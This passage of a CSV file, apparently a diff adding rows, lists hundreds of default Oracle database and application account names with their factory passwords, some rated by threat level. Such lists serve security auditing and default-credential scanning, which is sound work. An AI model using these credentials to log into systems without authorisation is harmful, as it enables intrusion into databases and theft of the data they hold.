corporation,Oracle,,,TIBCO,TIBCO,,, +oracle corporation,Oracle,,,TIP37,TIP37,,, +oracle corporation,Oracle,,,TRACESVR,TRACE,,, +oracle corporation,Oracle,,,TRAVEL,TRAVEL,,, +oracle corporation,Oracle,,,TSDEV,TSDEV,,, +oracle corporation,Oracle,,,TSUSER,TSUSER,,, +oracle corporation,Oracle,,,TURBINE,TURBINE,,, +oracle corporation,Oracle,,,UDDISYS,,,, +oracle corporation,Oracle,,,ULTIMATE,ULTIMATE,,, +oracle corporation,Oracle,,,UM_ADMIN,UM_ADMIN,,, +oracle corporation,Oracle,,,UM_CLIENT,UM_CLIENT,,, +oracle corporation,Oracle,,,USER,USER,,, +oracle corporation,Oracle,,,USER0,USER0,,, +oracle corporation,Oracle,,,USER1,USER1,,, +oracle corporation,Oracle,,,USER2,USER2,,, +oracle corporation,Oracle,,,USER3,USER3,,, +oracle corporation,Oracle,,,USER4,USER4,,, +oracle corporation,Oracle,,,USER5,USER5,,, +oracle corporation,Oracle,,,USER6,USER6,,, +oracle corporation,Oracle,,,USER7,USER7,,, +oracle corporation,Oracle,,,USER8,USER8,,, +oracle corporation,Oracle,,,USER9,USER9,,, +oracle corporation,Oracle,,,USER_NAME,PASSWORD,,, +oracle corporation,Oracle,,,USUARIO,CLAVE,,, +oracle corporation,Oracle,,,UTILITY,UTILITY,,, +oracle corporation,Oracle,,,UTLBSTATU,UTLESTAT,,, +oracle corporation,Oracle,,,VEA,VEA,,, +oracle corporation,Oracle,,,VEH,VEH,,, +oracle corporation,Oracle,,,VERTEX_LOGIN,VERTEX_LOGIN,,, +oracle corporation,Oracle,,,VIDEOUSER,VIDEOUSER,,, +oracle corporation,Oracle,,,VIF_DEVELOPER,VIF_DEV_PWD,,, +oracle corporation,Oracle,,,VIRUSER,VIRUSER,,, +oracle corporation,Oracle,,,VPD_ADMIN,AKF7D98S2,,, +oracle corporation,Oracle,,,VRR1,UNKNOWN,,, +oracle corporation,Oracle,,,WEBCAL01,WEBCAL01,,, +oracle corporation,Oracle,,,WEBDB,WEBDB,,, +oracle corporation,Oracle,,,WEBREAD,WEBREAD,,, +oracle corporation,Oracle,,,WEBSYS,MANAGER,,, +oracle corporation,Oracle,,,WEBUSER,YOUR_PASS,,, +oracle corporation,Oracle,,,WEST,WEST,,, +oracle corporation,Oracle,,,WFADMIN,WFADMIN,,, +oracle corporation,Oracle,,,WH,WH,,, +oracle corporation,Oracle,,,WIP,WIP,,, +oracle corporation,Oracle,,,WIRELESS,,,, +oracle corporation,Oracle,,,WKADMIN,WKADMIN,,, +oracle corporation,Oracle,,,WKPROXY,UNKNOWN,,, +oracle corporation,Oracle,,,WKSYS,WKSYS,,, +oracle corporation,Oracle,,,WKUSER,WKUSER,,, +oracle corporation,Oracle,,,WK_PROXY,,,, +oracle corporation,Oracle,,,WK_SYS,,,, +oracle corporation,Oracle,,,WK_TEST,WK_TEST,,, +oracle corporation,Oracle,,,WMS,WMS,,, +oracle corporation,Oracle,,,WMSYS,WMSYS,,, +oracle corporation,Oracle,,,WOB,WOB,,, +oracle corporation,Oracle,,,WPS,WPS,,, +oracle corporation,Oracle,,,WSH,WSH,,, +oracle corporation,Oracle,,,WSM,WSM,,, +oracle corporation,Oracle,,,WWW,WWW,,, +oracle corporation,Oracle,,,WWWUSER,WWWUSER,,, +oracle corporation,Oracle,,,XADEMO,XADEMO,,, +oracle corporation,Oracle,,,XDB,CHANGE_ON_INSTALL,,, +oracle corporation,Oracle,,,XDP,XDP,,, +oracle corporation,Oracle,,,XLA,XLA,,, +oracle corporation,Oracle,,,XNC,XNC,,, +oracle corporation,Oracle,,,XNI,XNI,,, +oracle corporation,Oracle,,,XNM,XNM,,, +oracle corporation,Oracle,,,XNP,XNP,,, +oracle corporation,Oracle,,,XNS,XNS,,, +oracle corporation,Oracle,,,XPRT,XPRT,,, +oracle corporation,Oracle,,,XTR,XTR,,, +oracle,7 or later,,,Scott,Tiger,,Any, +oracle,7 or later,,,sys,change_on_install,,, +oracle,7 or later,,,system,manager,,, +oracle,8.1.7,,,,,,, +oracle,8.1.7,,Admin,,,,, +oracle,8.1.7,,Multi,,,Admin,, +oracle,8i,,,internal,oracle,,all, +oracle,8i,,,sys,change_on_install,,8.1.6, +oracle,Database,Any,,#INTERNAL,ORACLE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,#INTERNAL,SYS_STNT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ABM,ABM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,ADAMS,WOOD,Threatcon 4 (least serious),, +oracle,Database,Any,,ADLDEMO,ADLDEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ADMIN,JETSPEED,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ADMIN,WELCOME,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ADMINISTRATOR,ADMIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ADMINISTRATOR,ADMINISTRATOR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AHL,AHL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AHM,AHM,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AK,AK,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,ALHRO,XXX,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ALHRW,XXX,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ALR,ALR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AMS,AMS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,AMV,AMV,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,ANDY,SWORDFISH,Threatcon 4 (least serious),, +oracle,Database,Any,,ANONYMOUS,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ANONYMOUS,ANONYMOUS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AP,AP,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,APPLMGR,APPLMGR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,APPLSYS,APPLSYS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,APPLSYS,APPS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,APPLSYS,FND,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,APPLSYSPUB,APPLSYSPUB,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,APPLSYSPUB,FNDPUB,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,APPLSYSPUB,PUB,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,APPLYSYSPUB,FNDPUB,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,APPLYSYSPUB,PUB,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,APPS,APPS,Threatcon 1 (most serious),, +oracle,Database,Any,,APPS_MRC,APPS,Threatcon 1 (most serious),, +oracle,Database,Any,,APPUSER,APPPASSWORD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AQ,AQ,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AQDEMO,AQDEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AQJAVA,AQJAVA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AQUSER,AQUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AR,AR,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,ASF,ASF,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ASG,ASG,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ASL,ASL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ASO,ASO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ASP,ASP,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AST,AST,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ATM,SAMPLEATM,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AUDIOUSER,AUDIOUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AURORA$JIS$UTILITY$,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AURORA$JIS$UTILITY$,INVALID,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AURORA$ORB$UNAUTHENTICATED,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AURORA$ORB$UNAUTHENTICATED,INVALID,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AX,AX,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AZ,AZ,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,BC4J,BC4J,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,BEN,BEN,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,BIC,BIC,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,BIL,BIL,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,BIM,BIM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,BIS,BIS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,BIV,BIV,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,BIX,BIX,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,BLAKE,PAPER,Threatcon 4 (least serious),, +oracle,Database,Any,,BLEWIS,BLEWIS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,BOM,BOM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,BRIO_ADMIN,BRIO_ADMIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,BRUGERNAVN,ADGANGSKODE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,BRUKERNAVN,PASSWORD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,BSC,BSC,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,BUG_REPORTS,BUG_REPORTS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CALVIN,HOBBES,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CATALOG,CATALOG,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CCT,CCT,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CDEMO82,CDEMO82,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CDEMO82,CDEMO83,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CDEMO82,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CDEMOCOR,CDEMOCOR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CDEMORID,CDEMORID,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CDEMOUCB,CDEMOUCB,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CDOUGLAS,CDOUGLAS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CE,CE,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CENTRA,CENTRA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CENTRAL,CENTRAL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CIDS,CIDS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CIS,CIS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CIS,ZWERG,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CISINFO,CISINFO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CISINFO,ZWERG,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CLARK,CLOTH,Threatcon 4 (least serious),, +oracle,Database,Any,,CLKANA,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CLKRT,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CN,CN,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,COMPANY,COMPANY,Threatcon 1 (most serious),, +oracle,Database,Any,,COMPIERE,COMPIERE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CQSCHEMAUSER,PASSWORD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CQUSERDBUSER,PASSWORD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CRP,CRP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CS,CS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CSC,CSC,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CSD,CSD,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CSE,CSE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CSF,CSF,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CSI,CSI,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CSL,CSL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CSMIG,CSMIG,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CSP,CSP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CSR,CSR,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CSS,CSS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CTXDEMO,CTXDEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CTXSYS,,Threatcon 1 (most serious),, +oracle,Database,Any,,CTXSYS,CHANGE_ON_INSTALL,Threatcon 1 (most serious),, +oracle,Database,Any,,CTXSYS,CTXSYS,Threatcon 1 (most serious),, +oracle,Database,Any,,CTXSYS,UNKNOWN,Threatcon 1 (most serious),, +oracle,Database,Any,,CUA,CUA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CUE,CUE,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CUF,CUF,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CUG,CUG,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CUI,CUI,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CUN,CUN,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CUP,CUP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CUS,CUS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CZ,CZ,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,DATA_SCHEMA,LASKJDF098KSDAF09,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DBI,MUMBLEFRATZ,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,DBSNMP,DBSNMP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,DBVISION,DBVISION,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DCM,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DDIC,199220706,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DEMO,DEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DEMO8,DEMO8,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DEMO9,DEMO9,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DES,DES,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DES2K,DES2K,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DEV2000_DEMOS,DEV2000_DEMOS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DIANE,PASSWO1,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DIP,DIP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,DISCOVERER5,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DISCOVERER_ADMIN,DISCOVERER_ADMIN,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,DMSYS,DMSYS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DPF,DPFPASS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DSGATEWAY,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DSGATEWAY,DSGATEWAY,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DSSYS,DSSYS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DTSP,DTSP,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,EAA,EAA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,EAM,EAM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,EARLYWATCH,SUPPORT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,EAST,EAST,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,EC,EC,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,ECX,ECX,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,EJB,EJB,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,EJSADMIN,EJSADMIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,EJSADMIN,EJSADMIN_PASSWORD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,EMP,EMP,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ENG,ENG,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,ENI,ENI,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,ESTOREUSER,ESTORE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,EVENT,EVENT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,EVM,EVM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,EXAMPLE,EXAMPLE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,EXFSYS,EXFSYS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,EXTDEMO,EXTDEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,EXTDEMO2,EXTDEMO2,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,FA,FA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,FEM,FEM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,FII,FII,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,FINANCE,FINANCE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,FINPROD,FINPROD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,FLM,FLM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,FND,FND,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,FOO,BAR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,FPT,FPT,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,FRM,FRM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,FROSTY,SNOWMAN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,FTE,FTE,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,FV,FV,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,GL,GL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,GMA,GMA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,GMD,GMD,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,GME,GME,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,GMF,GMF,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,GMI,GMI,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,GML,GML,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,GMP,GMP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,GMS,GMS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,GPFD,GPFD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,GPLD,GPLD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,GR,GR,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,HADES,HADES,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,HCPARK,HCPARK,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,HLW,HLW,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,HR,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,HR,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,HR,HR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,HR,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,HRI,HRI,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,HVST,HVST,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,HXC,HXC,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,HXT,HXT,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IBA,IBA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IBE,IBE,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IBP,IBP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IBU,IBU,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IBY,IBY,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,ICDBOWN,ICDBOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ICX,ICX,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IDEMO_USER,IDEMO_USER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,IEB,IEB,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IEC,IEC,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,IEM,IEM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IEO,IEO,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IES,IES,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IEU,IEU,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IEX,IEX,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IFSSYS,IFSSYS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,IGC,IGC,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IGF,IGF,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IGI,IGI,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IGS,IGS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IGW,IGW,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IMAGEUSER,IMAGEUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,IMC,IMC,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,IMEDIA,IMEDIA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,IMT,IMT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,INTERNAL,ORACLE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,INTERNAL,SYS_STNT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,INV,INV,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IPA,IPA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IPD,IPD,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IPLANET,IPLANET,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ISC,ISC,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,ITG,ITG,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,JA,JA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,JAKE,PASSWO4,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,JE,JE,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,JG,JG,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,JILL,PASSWO2,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,JL ,JL ,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,JMUSER,JMUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,JOHN,JOHN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,JONES,STEEL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,JTF,JTF,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,JTM,JTM,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,JTS,JTS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,JWARD,AIROPLANE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,KWALKER,KWALKER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,L2LDEMO,L2LDEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,LBACSYS,LBACSYS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,LIBRARIAN,SHELVES,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MANPROD,MANPROD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MARK,PASSWO3,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MASCARM,MANAGER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MASTER,PASSWORD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MDDATA,MDDATA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MDDEMO,MDDEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MDDEMO_CLERK,CLERK,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MDDEMO_CLERK,MGR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MDDEMO_MGR,MDDEMO_MGR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MDDEMO_MGR,MGR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MDSYS,MDSYS,Threatcon 1 (most serious),, +oracle,Database,Any,,ME,ME,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,MFG,MFG,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,MGR,MGR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MGWUSER,MGWUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MIGRATE,MIGRATE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MILLER,MILLER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MMO2,MMO2,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MMO2,MMO3,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MMO2,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MODTEST,YES,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MOREAU,MOREAU,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MRP,MRP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,MSC,MSC,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,MSD,MSD,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,MSO,MSO,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,MSR,MSR,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,MTSSYS,MTSSYS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MTS_USER,MTS_PASSWORD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,MWA,MWA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,MXAGENT,MXAGENT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,NAMES,NAMES,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,NEOTIX_SYS,NEOTIX_SYS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,NNEUL,NNEULPASS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,NOMEUTENTE,PASSWORD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,NOME_UTILIZADOR,SENHA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,NOM_UTILISATEUR,MOT_DE_PASSE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,NUME_UTILIZATOR,PAROL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OAIHUB902,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OAS_PUBLIC,OAS_PUBLIC,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OCITEST,OCITEST,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OCM_DB_ADMIN,OCM_DB_ADMIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ODM,ODM,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ODM_MTR,MTRPW,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ODS,ODS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ODSCOMMON,ODSCOMMON,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ODS_SERVER,ODS_SERVER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OE,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OE,OE,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OE,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OEMADM,OEMADM,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OEMREP,OEMREP,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OEM_REPOSITORY,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OKB,OKB,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OKC,OKC,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OKE,OKE,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OKI,OKI,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OKO,OKO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OKR,OKR,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OKS,OKS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OKX,OKX,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OLAPDBA,OLAPDBA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OLAPSVR,INSTANCE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OLAPSVR,OLAPSVR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OLAPSYS,MANAGER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OLAPSYS,OLAPSYS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OMWB_EMULATION,ORACLE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ONT,ONT,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OO,OO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OPENSPIRIT,OPENSPIRIT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OPI,OPI,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,ORACACHE,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORACACHE,ORACACHE,Threatcon 3 (1 is most 